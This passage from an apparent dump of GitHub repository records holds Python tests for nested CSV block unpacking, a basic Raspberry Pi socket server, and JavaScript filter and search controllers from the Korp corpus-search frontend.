list(flatten(nested))\n\ndef _unpack_as_singleton(var_id: str, values: Dict) -> Iterator[List[str]]:\n value: Optional[Any] = values.get(var_id)\n yield [[value]]\n\ndef _unpack_as_list(block: Tuple, values: List) -> Iterator[List[Optional[Any]]]:\n if values is None:\n yield [None] * len(block)\n return\n for i, element in enumerate(values):\n yield list(as_block_value(block, element))\n\ndef _unpack_as_dictionary(block: Tuple, values: Dict) -> Iterator[List[Optional[Any]]]:\n if values is None:\n yield [None] * (len(block) + 1)\n return\n for i, (key, element) in enumerate(values.items()):\n yield [key] + list(as_block_value(block, element))\n\ndef as_block_value(block: Tuple, values: Dict) -> Iterator[List[Optional[Any]]]:\n \"\"\"Takes a block of variable IDs representing a primitive, a list, or a named list (including nested lists and\n named lists) and yields lists of column values, where the columns represent a block of a larger CSV.\"\"\"\n block_values: List = [None] * len(block)\n for i, subblock in enumerate(block):\n if isinstance(subblock, str):\n block_values[i] = _unpack_as_singleton(subblock, values)\n elif isinstance(subblock, tuple):\n root_id: str = subblock[0]\n dt: str = data_types[root_id]\n if dt == \"List\":\n nested_values: Optional[List] = values.get(root_id)\n block_values[i] = _unpack_as_list(subblock[1:], nested_values)\n elif dt == \"Dictionary\":\n nested_values: Optional[Dict] = values.get(root_id)\n block_values[i] = _unpack_as_dictionary(subblock[1:], nested_values)\n else:\n raise ValueError('Variable \"%s\" (%s) is not a List or Dictionary root' % (root_id, dt))\n yield from _cartesian(block_values)\n\ndef test_singleton(common_values):\n block: Tuple = (\"text_in_folder\",)\n expected: List = [[\"foo\"]]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_list(common_values):\n block: Tuple = ((\"list_in_folder\", \"int_in_list_in_folder\", \"text_in_list_in_folder\"),)\n expected: List = [[None, \"a\"], [2, \"b\"], [3, \"c\"]]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_list_with_initial_singleton(common_values):\n block: Tuple = (\"text_in_folder\", (\"list_in_folder\", \"int_in_list_in_folder\", \"text_in_list_in_folder\"))\n expected: List = [[\"foo\", None, \"a\"], [\"foo\", 2, \"b\"], [\"foo\", 3, \"c\"]]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_list_with_final_singleton(common_values):\n block: Tuple = ((\"list_in_folder\", \"int_in_list_in_folder\", \"text_in_list_in_folder\"), \"text_in_folder\")\n expected: List = [[None, \"a\", \"foo\"], [2, \"b\", \"foo\"], [3, \"c\", \"foo\"]]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_list_with_no_columns(common_values):\n block: Tuple = ((\"list_in_folder\",),)\n expected: List = [[], [], []]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_empty_list():\n block: Tuple = ((\"list_in_folder\", \"int_in_list_in_folder\", \"text_in_list_in_folder\"),)\n expected: List = [[None, None]]\n actual: List = list(as_block_value(block, {}))\n assert actual == expected\n\ndef test_dictionary(common_values):\n block: Tuple = ((\"dictionary_in_root\", \"int_in_dictionary\", \"text_in_dictionary\"),)\n expected: List = [[\"peter\", None, \"a\"], [\"paul\", 2, \"b\"], [\"mary\", 3, \"c\"]]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_dictionary_with_no_columns(common_values):\n block: Tuple = ((\"dictionary_in_root\",),)\n expected: List = [[\"peter\"], [\"paul\"], [\"mary\"]]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_empty_dictionary():\n block: Tuple = ((\"dictionary_in_root\", \"int_in_dictionary\", \"text_in_dictionary\"),)\n expected: List = [[None, None, None]]\n actual: List = list(as_block_value(block, {}))\n assert actual == expected\n\ndef test_nested_list(common_values):\n block: Tuple = ((\n \"outer_nested_list\",\n (\n \"inner_nested_list\",\n \"text_in_inner_nested_list\"\n ),\n \"text_in_outer_nested_list\"\n ),)\n expected: List = [\n [None, \"a\"],\n [None, \"b\"],\n [\"foo\", \"c\"],\n [\"bar\", \"c\"]\n ]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_nested_dictionary(common_values):\n block: Tuple = ((\n \"outer_nested_dictionary\",\n (\n \"inner_nested_dictionary\",\n \"text_in_inner_nested_dictionary\"\n ),\n \"text_in_outer_nested_dictionary\"\n ),)\n expected: List = [\n [\"peter\", None, None, \"a\"],\n [\"paul\", None, None, \"b\"],\n [\"mary\", \"orange\", \"foo\", \"c\"],\n [\"mary\", \"yellow\", \"bar\", \"c\"]\n ]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_dictionary_in_nested_list(common_values):\n block: Tuple = ((\n \"outer_nested_list\",\n (\n \"inner_nested_list\",\n \"text_in_inner_nested_list\",\n (\n \"dictionary_in_inner_nested_list\",\n \"text_in_dictionary_in_inner_nested_list\"\n )\n ),\n \"text_in_outer_nested_list\"\n ),)\n expected: List = [\n [None, None, None, \"a\"],\n [None, None, None, \"b\"],\n [\"foo\", None, None, \"c\"],\n [\"bar\", \"black\", \"white\", \"c\"],\n [\"bar\", \"green\", \"red\", \"c\"],\n ]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n\ndef test_empty_nested_dictionary():\n values: Dict = {}\n block: Tuple = (\n (\n \"outer_nested_dictionary\",\n (\n \"inner_nested_dictionary\",\n \"text_in_inner_nested_dictionary\"\n ),\n \"text_in_outer_nested_dictionary\"\n ),\n )\n expected: List = [[None, None, None, None]]\n actual: List = list(as_block_value(block, values))\n assert actual == expected\n\ndef test_list_in_nested_dictionary(common_values):\n block: Tuple = ((\n \"outer_nested_dictionary\",\n (\n \"inner_nested_dictionary\",\n \"text_in_inner_nested_dictionary\",\n (\n \"list_in_inner_nested_dictionary\",\n \"text_in_list_in_inner_nested_dictionary\"\n )\n ),\n \"text_in_outer_nested_dictionary\"\n ),)\n expected: List = [\n [\"peter\", None, None, None, \"a\"],\n [\"paul\", None, None, None, \"b\"],\n [\"mary\", \"orange\", \"foo\", None, \"c\"],\n [\"mary\", \"yellow\", \"bar\", \"black\", \"c\"],\n [\"mary\", \"yellow\", \"bar\", \"white\", \"c\"],\n ]\n actual: List = list(as_block_value(block, common_values))\n assert actual == expected\n"
}
] | 1 |
mrrtscott/Assignment_ | https://github.com/mrrtscott/Assignment_ | 1e18035d94ef02f924a460957bc3832a2d769dc5 | dffbc0155c2f02d480729e60794b790ed0e9a0bd | fc7a5a61bb42811108bd8e56152d5d50a5c0ebd8 | refs/heads/master | 2020-04-08T09:24:11.599591 | 2018-11-26T19:34:02 | 2018-11-26T19:34:02 | 159,221,930 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7916666865348816,
"alphanum_fraction": 0.7916666865348816,
"avg_line_length": 10.5,
"blob_id": "22d44bb5ab5da1dbf61220f388e0e3d7be74bb25",
"content_id": "d72ac07793f198ac811d781bfa3b8c21b718d5fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 24,
"license_type": "no_license",
"max_line_length": 11,
"num_lines": 2,
"path": "/Assignment_1127.py",
"repo_name": "mrrtscott/Assignment_",
"src_encoding": "UTF-8",
"text": "\nimport math\nimport sys\n"
}
] | 1 |
msatul1305/raspberryPiProject | https://github.com/msatul1305/raspberryPiProject | 5ed1545f9e9d05f6d0819e6be060f153f84de4ce | 6ae791d706b9e224a314a7509c788a7ac3956fcf | b46c1455cc506a269e35ecb4af77582bd9f6167c | refs/heads/master | 2020-05-31T05:43:57.093229 | 2019-06-04T03:55:26 | 2019-06-04T03:55:26 | 190,125,554 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6778115630149841,
"alphanum_fraction": 0.6990881562232971,
"avg_line_length": 22.5,
"blob_id": "98db1c6fcd1faa1b8a8ab3d08aa22a9842a00108",
"content_id": "b3cbb4a422e55853666ba01f1d0891f77a5b3817",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 329,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 14,
"path": "/server.py",
"repo_name": "msatul1305/raspberryPiProject",
"src_encoding": "UTF-8",
"text": "import socket\ns=socket.socket()\nprint(\"socket created successfully\")\nport = 12345\ns.bind(('',port))\nprint(\"socket binded to port %s\"%(port))\ns.listen(5)\nprint (\"socket is listening...\")\nwhile True:\n\tc,addr=s.accept()\n\tprint(\"got a connection from\",addr)\n\tstr=\"thank you for connecting\"\n\tc.sendall(str.encode('utf-8'))\n\tc.close()\n"
}
] | 1 |
UAlbertaALTLab/korp-frontend | https://github.com/UAlbertaALTLab/korp-frontend | 73581e7bbec747292e3c978d175690132c00755e | 34c499573238a4451e82ce397739f856984820ce | 9467956552ba071f3a1fdf9f2731ba22f9ebde32 | refs/heads/main | 2023-04-14T17:59:00.642218 | 2021-02-20T01:26:15 | 2021-02-20T01:26:15 | 292,864,111 | 1 | 0 | MIT | 2020-09-04T14:09:26 | 2021-02-20T01:26:28 | 2021-02-25T17:11:59 | JavaScript | [
{
"alpha_fraction": 0.5076419115066528,
"alphanum_fraction": 0.5087336301803589,
"avg_line_length": 32.39583206176758,
"blob_id": "8718079e56eaeeaf7936592797018e12b872aeb9",
"content_id": "ba7ffd7b031ca47b8281b6bef4d264145de31864",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 12824,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 384,
"path": "/app/scripts/struct_services.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nconst korpApp = angular.module(\"korpApp\")\n\n// Data service for the global filter in korp\n// Directive is duplicated in simple and extended search\n// so this directive holds all state concering the users input\n// and what possible filters and values are available\n\n// diretives calls registerScope to register for updates\n// service calls scope.update() when changes occur\nkorpApp.factory(\"globalFilterService\", function ($rootScope, $location, $q, structService) {\n const scopes = []\n\n const callDirectives = () =>\n listenerDef.promise.then(() => scopes.map((scope) => scope.update(dataObj)))\n\n // deferred for waiting for all directives to register\n var listenerDef = $q.defer()\n\n var dataObj = {\n selectedFilters: [],\n filterValues: {},\n defaultFilters: [],\n optionalFilters: [],\n attributes: {},\n mode: \"simple\",\n showDirective: false,\n }\n\n let currentData = {}\n\n const initFilters = function () {\n let filter\n const filterValues = dataObj.filterValues || {}\n\n // delete any filter values that are not in the selected filters\n for (filter in filterValues) {\n const v = filterValues[filter]\n if (!dataObj.selectedFilters.includes(filter)) {\n delete filterValues[filter]\n }\n }\n\n // create object for every filter that is selected but not yet created\n for (filter of dataObj.selectedFilters) {\n if (!(filter in filterValues)) {\n const newFilter = {}\n newFilter.value = []\n newFilter.possibleValues = []\n filterValues[filter] = newFilter\n }\n }\n\n dataObj.filterValues = filterValues\n }\n\n // only send corpora that supports all selected filters (if filterSelection is \"union\")\n const getSupportedCorpora = function () {\n const corporaPerFilter = _.map(\n dataObj.selectedFilters,\n (filter) => dataObj.attributes[filter].corpora\n )\n return _.intersection(...(corporaPerFilter || []))\n }\n\n var mergeObjects = function (...values) {\n if (_.every(values, (val) => Array.isArray(val))) {\n return _.union(...(values || []))\n } else if (_.every(values, (val) => !Array.isArray(val) && typeof val === \"object\")) {\n const newObj = {}\n const allKeys = _.union(...(_.map(values, (val) => _.keys(val)) || []))\n for (let k of allKeys) {\n const allValsForKey = _.map(values, (val) => val[k])\n const newValues = _.filter(\n allValsForKey,\n (val) => !_.isEmpty(val) || Number.isInteger(val)\n )\n newObj[k] = mergeObjects(...(newValues || []))\n }\n return newObj\n } else if (_.every(values, (val) => Number.isInteger(val))) {\n return _.reduce(values, (a, b) => a + b, 0)\n } else {\n c.error(\"Cannot merge objects a and b\")\n }\n }\n\n // get data for selected attributes from backend, merges values from different corpora\n // and flattens data structure?\n const getData = function () {\n const corpora = getSupportedCorpora()\n\n const opts = {}\n if (dataObj.attributes[_.last(dataObj.defaultFilters)].settings.type === \"set\") {\n opts.split = true\n }\n return structService\n .getStructValues(corpora, dataObj.selectedFilters, opts)\n .then(function (data) {\n currentData = {}\n for (let corpus of corpora) {\n const object = data[corpus.toUpperCase()]\n for (let k in object) {\n const v = object[k]\n if (!(k in currentData)) {\n currentData[k] = v\n } else {\n currentData[k] = mergeObjects(currentData[k], v)\n }\n }\n }\n updateData()\n })\n }\n\n // when user selects an attribute, update all possible filter values and counts\n var updateData = function () {\n let filter\n var collectAndSum = function (filters, elements, parentSelected) {\n const filter = filters[0]\n const children = []\n const { possibleValues } = dataObj.filterValues[filter]\n const currentValues = dataObj.filterValues[filter].value\n let sum = 0\n const values = []\n let include = false\n for (let value in elements) {\n var childCount\n const child = elements[value]\n const selected = currentValues.includes(value) || _.isEmpty(currentValues)\n\n // filter of any parent values that do not support the child values\n include = include || selected\n\n if (Number.isInteger(child)) {\n childCount = child\n include = true\n } else {\n ;[childCount, include] = collectAndSum(\n _.tail(filters),\n child,\n parentSelected && selected\n )\n }\n\n if (include && parentSelected) {\n possibleValues.push([value, childCount])\n } else {\n possibleValues.push([value, 0])\n }\n if (selected && include) {\n sum += childCount\n }\n\n values.push(value)\n }\n\n return [sum, include]\n }\n\n // reset all filters\n for (filter of dataObj.selectedFilters) {\n dataObj.filterValues[filter].possibleValues = []\n }\n\n // recursively decide the counts of all values\n collectAndSum(dataObj.selectedFilters, currentData, true)\n\n // merge duplicate child values\n for (filter of dataObj.selectedFilters) {\n const possibleValuesTmp = {}\n for (let [value, count] of dataObj.filterValues[filter].possibleValues) {\n if (!(value in possibleValuesTmp)) {\n possibleValuesTmp[value] = 0\n }\n possibleValuesTmp[value] += count\n }\n dataObj.filterValues[filter].possibleValues = []\n for (let k in possibleValuesTmp) {\n const v = possibleValuesTmp[k]\n dataObj.filterValues[filter].possibleValues.push([k, v])\n }\n\n dataObj.filterValues[filter].possibleValues.sort(function (a, b) {\n if (a[0] < b[0]) {\n return -1\n } else if (a[0] > b[0]) {\n return 1\n } else {\n return 0\n }\n })\n }\n }\n\n const addNewFilter = function (filter, update) {\n dataObj.selectedFilters.push(filter)\n initFilters()\n if (update) {\n return getData()\n }\n }\n\n const setFromLocation = function (globalFilter) {\n let attrKey\n if (!globalFilter) {\n return\n }\n if (!dataObj.filterValues) {\n return\n }\n const parsedFilter = JSON.parse(atob(globalFilter))\n for (attrKey in parsedFilter) {\n const attrValues = parsedFilter[attrKey]\n if (!(attrKey in dataObj.filterValues) && dataObj.optionalFilters.includes(attrKey)) {\n addNewFilter(attrKey, false)\n dataObj.filterValues[attrKey] = {}\n }\n\n if (dataObj.selectedFilters.includes(attrKey)) {\n dataObj.filterValues[attrKey].value = attrValues\n }\n }\n\n for (attrKey in dataObj.filterValues) {\n if (!(attrKey in parsedFilter)) {\n dataObj.filterValues[attrKey].value = []\n }\n }\n }\n\n const makeCqp = function () {\n const exprs = []\n const andArray = []\n for (var attrKey in dataObj.filterValues) {\n const attrValues = dataObj.filterValues[attrKey]\n const attrType = dataObj.attributes[attrKey].settings.type\n var op = attrType === \"set\" ? \"contains\" : \"=\"\n andArray.push(\n attrValues.value.map((attrValue) => ({\n type: `_.${attrKey}`,\n op,\n val: regescape(attrValue),\n }))\n )\n }\n\n return [{ and_block: andArray }]\n }\n\n const updateLocation = function () {\n const rep = {}\n for (let attrKey in dataObj.filterValues) {\n const attrValues = dataObj.filterValues[attrKey]\n if (!_.isEmpty(attrValues.value)) {\n rep[attrKey] = attrValues.value\n }\n }\n if (!_.isEmpty(rep)) {\n $location.search(\"global_filter\", btoa(JSON.stringify(rep)))\n $rootScope.globalFilter = makeCqp()\n } else {\n $location.search(\"global_filter\", null)\n $rootScope.globalFilter = null\n }\n }\n\n $rootScope.$on(\"corpuschooserchange\", function () {\n if (settings.corpusListing.selected.length === 0) {\n dataObj.showDirective = false\n } else {\n const [newDefaultFilters, defAttributes] = settings.corpusListing.getDefaultFilters()\n const [newOptionalFilters, possAttributes] = settings.corpusListing.getCurrentFilters()\n\n if (_.isEmpty(newDefaultFilters) && _.isEmpty(newOptionalFilters)) {\n dataObj.showDirective = false\n $location.search(\"global_filter\", null)\n for (let filter of dataObj.selectedFilters) {\n dataObj.filterValues[filter].value = []\n }\n } else {\n dataObj.showDirective = true\n dataObj.defaultFilters = newDefaultFilters\n dataObj.optionalFilters = newOptionalFilters\n dataObj.attributes = _.extend({}, defAttributes, possAttributes)\n\n dataObj.selectedFilters = newDefaultFilters.slice()\n\n initFilters()\n\n setFromLocation($location.search().global_filter)\n getData()\n updateLocation()\n callDirectives()\n }\n }\n $rootScope.globalFilterDef.resolve()\n })\n\n $rootScope.$watch(\n () => $location.search().global_filter,\n (filter) => setFromLocation(filter)\n )\n\n return {\n registerScope(scope) {\n scopes.push(scope)\n // TODO this will not work with parallel mode since only one directive is used :(\n if (scopes.length === 2) {\n listenerDef.resolve()\n }\n },\n removeFilter(filter) {\n _.remove(dataObj.selectedFilters, filter)\n initFilters()\n getData()\n updateLocation()\n },\n addNewFilter,\n valueChange(filter) {\n updateLocation()\n updateData()\n },\n }\n})\n\nkorpApp.factory(\"structService\", ($http, $q) => ({\n getStructValues(corpora, attributes, { count, returnByCorpora, split }) {\n const def = $q.defer()\n\n const structValue = attributes.join(\">\")\n if (count == null) {\n count = true\n }\n if (returnByCorpora == null) {\n returnByCorpora = true\n }\n\n const params = {\n corpus: corpora.join(\",\"),\n struct: structValue,\n count,\n }\n\n if (split) {\n params.split = _.last(attributes)\n }\n\n const conf = {\n url: settings.korpBackendURL + \"/struct_values\",\n params,\n method: \"GET\",\n headers: {},\n }\n\n _.extend(conf.headers, model.getAuthorizationHeader())\n\n $http(conf).then(function ({ data }) {\n let result, values\n if (data.ERROR) {\n def.reject()\n return\n }\n\n if (returnByCorpora) {\n result = {}\n for (corpora in data.corpora) {\n values = data.corpora[corpora]\n result[corpora] = values[structValue]\n }\n def.resolve(result)\n } else {\n result = []\n for (corpora in data.corpora) {\n values = data.corpora[corpora]\n result = result.concat(values[structValue])\n }\n def.resolve(result)\n }\n })\n\n return def.promise\n },\n}))\n"
},
{
"alpha_fraction": 0.483151912689209,
"alphanum_fraction": 0.4848865866661072,
"avg_line_length": 31.988555908203125,
"blob_id": "33d9290d8740f8975a7135d5cf4c9305f3b427d7",
"content_id": "06c43d5e6eaed4e2c51846518e86c0460d5ea6ce",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 23060,
"license_type": "permissive",
"max_line_length": 270,
"num_lines": 699,
"path": "/app/scripts/search_controllers.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nimport statemachine from \"./statemachine\"\nconst korpApp = angular.module(\"korpApp\")\n\nwindow.SearchCtrl = [\n \"$scope\",\n \"$location\",\n \"$filter\",\n \"searches\",\n function ($scope, $location, $filter, searches) {\n $scope.visibleTabs = [true, true, true, true]\n $scope.extendedTmpl = require(\"../views/extended_tmpl.pug\")\n // for parallel mode\n searches.langDef.resolve()\n $scope.isCompareSelected = false\n\n $scope.$watch(\n () => $location.search().search_tab,\n (val) => ($scope.isCompareSelected = val === 3)\n )\n\n const setupWatchWordPic = function () {\n $scope.$watch(\n () => $location.search().word_pic,\n (val) => ($scope.word_pic = Boolean(val))\n )\n\n $scope.$watch(\"word_pic\", (val) => $location.search(\"word_pic\", Boolean(val) || null))\n }\n\n const setupWatchStats = function () {\n $scope.showStatistics = true\n\n $scope.$watch(\n () => $location.search().hide_stats,\n (val) => ($scope.showStatistics = val == null)\n )\n\n $scope.$watch(\"showStatistics\", function (val) {\n if ($scope.showStatistics) {\n $location.search(\"hide_stats\", null)\n } else {\n $location.search(\"hide_stats\", true)\n }\n })\n }\n\n setupWatchWordPic()\n setupWatchStats()\n\n $scope.settings = settings\n $scope.showStats = () => settings.statistics !== false\n\n $scope.corpusChangeListener = $scope.$on(\"corpuschooserchange\", function (event, selected) {\n $scope.noCorporaSelected = !selected.length\n const allAttrs = settings.corpusListing.getStatsAttributeGroups()\n $scope.statCurrentAttrs = _.filter(allAttrs, (item) => !item.hideStatistics)\n $scope.statSelectedAttrs = ($location.search().stats_reduce || \"word\").split(\",\")\n const insensitiveAttrs = $location.search().stats_reduce_insensitive\n if (insensitiveAttrs) {\n $scope.statInsensitiveAttrs = insensitiveAttrs.split(\",\")\n }\n })\n\n $scope.$watch(\n \"statSelectedAttrs\",\n function (selected) {\n if (selected && selected.length > 0) {\n if (selected.length != 1 || !selected.includes(\"word\")) {\n $location.search(\"stats_reduce\", $scope.statSelectedAttrs.join(\",\"))\n } else {\n $location.search(\"stats_reduce\", null)\n }\n }\n },\n true\n )\n\n $scope.$watch(\n \"statInsensitiveAttrs\",\n function (insensitive) {\n if (insensitive && insensitive.length > 0) {\n $location.search(\n \"stats_reduce_insensitive\",\n $scope.statInsensitiveAttrs.join(\",\")\n )\n } else if (insensitive) {\n $location.search(\"stats_reduce_insensitive\", null)\n }\n },\n true\n )\n\n const setupHitsPerPage = function () {\n $scope.getHppFormat = function (val) {\n if (val === $scope.hitsPerPage) {\n return $filter(\"loc\")(\"hits_per_page\", $scope.lang) + \": \" + val\n } else {\n return val\n }\n }\n\n $scope.hitsPerPageValues = settings.hitsPerPageValues\n $scope.hitsPerPage = $location.search().hpp || settings.hitsPerPageDefault\n\n $scope.$watch(\n () => $location.search().hpp,\n (val) => ($scope.hitsPerPage = val || settings.hitsPerPageDefault)\n )\n\n return $scope.$watch(\"hitsPerPage\", function (val) {\n if (val === settings.hitsPerPageDefault) {\n return $location.search(\"hpp\", null)\n } else {\n return $location.search(\"hpp\", val)\n }\n })\n }\n\n const setupKwicSort = function () {\n const kwicSortValueMap = {\n \"\": \"appearance_context\",\n keyword: \"word_context\",\n left: \"left_context\",\n right: \"right_context\",\n random: \"random_context\",\n }\n $scope.kwicSortValues = _.keys(kwicSortValueMap)\n\n $scope.getSortFormat = function (val) {\n const mappedVal = kwicSortValueMap[val]\n if (val === $scope.kwicSort) {\n return (\n $filter(\"loc\")(\"sort_default\", $scope.lang) +\n \": \" +\n $filter(\"loc\")(mappedVal, $scope.lang)\n )\n } else {\n return $filter(\"loc\")(mappedVal, $scope.lang)\n }\n }\n\n $scope.kwicSort = $location.search().sort || \"\"\n\n $scope.$watch(\n () => $location.search().sort,\n (val) => ($scope.kwicSort = val || \"\")\n )\n\n return $scope.$watch(\"kwicSort\", function (val) {\n if (val === \"\") {\n return $location.search(\"sort\", null)\n } else {\n return $location.search(\"sort\", val)\n }\n })\n }\n\n setupHitsPerPage()\n setupKwicSort()\n },\n]\n\nkorpApp.controller(\"SearchCtrl\", window.SearchCtrl)\n\nkorpApp.controller(\"SimpleCtrl\", function (\n $scope,\n utils,\n $location,\n backend,\n $rootScope,\n searches,\n compareSearches,\n $uibModal,\n $timeout\n) {\n const s = $scope\n\n $scope.inOrder = $location.search().in_order == null\n $scope.$watch(\n () => $location.search().in_order,\n (val) => ($scope.inOrder = val == null)\n )\n\n statemachine.listen(\"lemgram_search\", (event) => {\n console.log(\"lemgram_search\", event)\n s.textInField = \"\"\n })\n\n $scope.$watch(\"inOrder\", () => $location.search(\"in_order\", !s.inOrder ? false : null))\n\n s.prefix = false\n s.mid_comp = false\n s.suffix = false\n s.isCaseInsensitive = false\n if (settings.inputCaseInsensitiveDefault) {\n s.isCaseInsensitive = true\n }\n\n s.$on(\"btn_submit\", function () {\n s.updateSearch()\n $location.search(\"within\", null)\n })\n\n // triggers watch on searches.activeSearch\n s.updateSearch = function () {\n locationSearch(\"search\", null)\n $timeout(function () {\n if (s.textInField) {\n util.searchHash(\"word\", s.textInField)\n s.model = null\n s.placeholder = null\n } else if (s.model) {\n util.searchHash(\"lemgram\", s.model)\n }\n }, 0)\n }\n\n s.$watch(\"getCQP()\", function (val) {\n if (!val) {\n return\n }\n $rootScope.simpleCQP = CQP.expandOperators(val)\n })\n\n s.getCQP = function () {\n let suffix, val\n const currentText = (s.textInField || \"\").trim()\n\n if (currentText) {\n suffix = s.isCaseInsensitive ? \" %c\" : \"\"\n const wordArray = currentText.split(\" \")\n const tokenArray = _.map(wordArray, (token) => {\n const orParts = []\n if (s.prefix) {\n orParts.push(token + \".*\")\n }\n if (s.mid_comp) {\n orParts.push(`.*${token}.*`)\n }\n if (s.suffix) {\n orParts.push(`.*${token}`)\n }\n if (!(s.prefix || s.suffix)) {\n orParts.push(regescape(token))\n }\n const res = _.map(orParts, (orPart) => `word = \"${orPart}\"${suffix}`)\n return `[${res.join(\" | \")}]`\n })\n val = tokenArray.join(\" \")\n } else if (s.placeholder || util.isLemgramId(currentText)) {\n const lemgram = s.model ? s.model : currentText\n val = `[lex contains \\\"${lemgram}\\\"`\n if (s.prefix) {\n val += ` | complemgram contains \\\"${lemgram}\\\\+.*\\\"`\n }\n if (s.mid_comp) {\n val += ` | complemgram contains \\\".*\\\\+${lemgram}\\\\+.*\\\"`\n }\n if (s.suffix) {\n val += ` | complemgram contains \\\".*\\\\+${lemgram}:.*\\\"`\n }\n val += \"]\"\n }\n\n if ($rootScope.globalFilter) {\n val = CQP.stringify(CQP.mergeCqpExprs(CQP.parse(val || \"[]\"), $rootScope.globalFilter))\n }\n\n return val\n }\n\n s.$on(\"popover_submit\", (event, name) => compareSearches.saveSearch(name, s.getCQP()))\n\n s.stringifyRelatedHeader = (wd) => wd.replace(/_/g, \" \")\n\n s.stringifyRelated = (wd) => util.saldoToString(wd)\n\n let modalInstance = null\n s.clickRelated = function (wd, attribute) {\n let cqp\n if (modalInstance != null) {\n modalInstance.close()\n }\n $scope.$root.searchtabs()[1].tab.select()\n if (attribute === \"saldo\") {\n cqp = `[saldo contains \\\"${regescape(wd)}\\\"]`\n } else {\n cqp = `[sense rank_contains \\\"${regescape(wd)}\\\"]`\n }\n s.$root.$broadcast(\"extended_set\", cqp)\n $location.search(\"search\", \"cqp\")\n return $location.search(\"cqp\", cqp)\n }\n\n s.relatedDefault = 3\n s.clickX = () => modalInstance.dismiss()\n\n s.showAllRelated = () =>\n (modalInstance = $uibModal.open({\n template: `\\\n <div class=\"modal-header\">\n <h3 class=\"modal-title\">{{'similar_header' | loc:lang}} (SWE-FN)</h3>\n <span ng-click=\"clickX()\" class=\"close-x\">×</span>\n </div>\n <div class=\"modal-body\">\n <div ng-repeat=\"obj in relatedObj\" class=\"col\"><a target=\"_blank\" ng-href=\"https://spraakbanken.gu.se/karp/#?mode=swefn&lexicon=swefn&search=extended||and|sense|equals|swefn--{{obj.label}}\" class=\"header\">{{stringifyRelatedHeader(obj.label)}}</a>\n <div class=\"list_wrapper\">\n <ul>\n <li ng-repeat=\"wd in obj.words\"> <a ng-click=\"clickRelated(wd, relatedObj.attribute)\" class=\"link\">{{stringifyRelated(wd) + \" \"}}</a></li>\n </ul>\n </div>\n </div>\n </div>\\\n `,\n scope: s,\n size: \"lg\",\n windowClass: \"related\",\n }))\n\n s.searches = searches\n s.$watch(\"searches.activeSearch\", function (search) {\n if (!search) {\n return\n }\n if (search.type === \"word\" || search.type === \"lemgram\") {\n if (search.type === \"word\") {\n s.textInField = search.val\n } else {\n s.placeholder = unregescape(search.val)\n s.model = search.val\n }\n s.doSearch()\n } else {\n s.placeholder = null\n if (\"lemgramResults\" in window) {\n lemgramResults.resetView()\n }\n }\n })\n\n s.doSearch = function () {\n const search = searches.activeSearch\n s.relatedObj = null\n const cqp = s.getCQP()\n searches.kwicSearch(cqp, search && search.pageOnly)\n\n if (!(search && search.pageOnly)) {\n if (search.type === \"lemgram\") {\n let sense = false\n let saldo = false\n for (let corpus of settings.corpusListing.selected) {\n if (\"sense\" in corpus.attributes) {\n sense = true\n }\n if (\"saldo\" in corpus.attributes) {\n saldo = true\n }\n }\n\n if (sense || saldo) {\n backend.relatedWordSearch(unregescape(search.val)).then(function (data) {\n s.relatedObj = data\n if (data.length > 2 && data[0].label == \"Excreting\") {\n let [first, second, ...rest] = data\n s.relatedObj.data = [second, first, ...rest]\n }\n s.relatedObj.attribute = sense ? \"sense\" : \"saldo\"\n })\n }\n }\n\n if (s.word_pic && (search.type === \"lemgram\" || !search.val.includes(\" \"))) {\n const value = search.type === \"lemgram\" ? unregescape(search.val) : search.val\n return searches.lemgramSearch(value, search.type)\n } else {\n if (\"lemgramResults\" in window) {\n lemgramResults.resetView()\n }\n }\n }\n }\n\n utils.setupHash(s, [\n { key: \"prefix\", default: false },\n { key: \"mid_comp\", default: false },\n { key: \"suffix\", default: false },\n { key: \"isCaseInsensitive\" },\n ])\n})\n\nkorpApp.controller(\"ExtendedSearch\", function (\n $scope,\n $location,\n $rootScope,\n searches,\n compareSearches,\n $timeout\n) {\n const s = $scope\n s.$on(\"popover_submit\", (event, name) =>\n compareSearches.saveSearch(name, $rootScope.extendedCQP)\n )\n\n s.searches = searches\n s.$on(\"btn_submit\", function () {\n $location.search(\"search\", null)\n $location.search(\"page\", null)\n $location.search(\"in_order\", null)\n $timeout(function () {\n $location.search(\"search\", \"cqp\")\n if (!_.keys(settings.defaultWithin).includes(s.within)) {\n var { within } = s\n }\n $location.search(\"within\", within)\n }, 0)\n })\n\n s.$on(\"extended_set\", ($event, val) => (s.cqp = val))\n\n if ($location.search().cqp) {\n s.cqp = $location.search().cqp\n }\n\n s.$watch(\"repeatError\", (repeatError) => (s.searchDisabled = repeatError))\n\n const updateExtendedCQP = function () {\n let val2 = CQP.expandOperators(s.cqp)\n if ($rootScope.globalFilter) {\n val2 = CQP.stringify(\n CQP.mergeCqpExprs(CQP.parse(val2 || \"[]\"), $rootScope.globalFilter)\n )\n }\n $rootScope.extendedCQP = val2\n }\n\n $rootScope.$watch(\"globalFilter\", function () {\n if ($rootScope.globalFilter) {\n updateExtendedCQP()\n }\n })\n\n s.$watch(\"cqp\", function (val) {\n if (!val) {\n return\n }\n 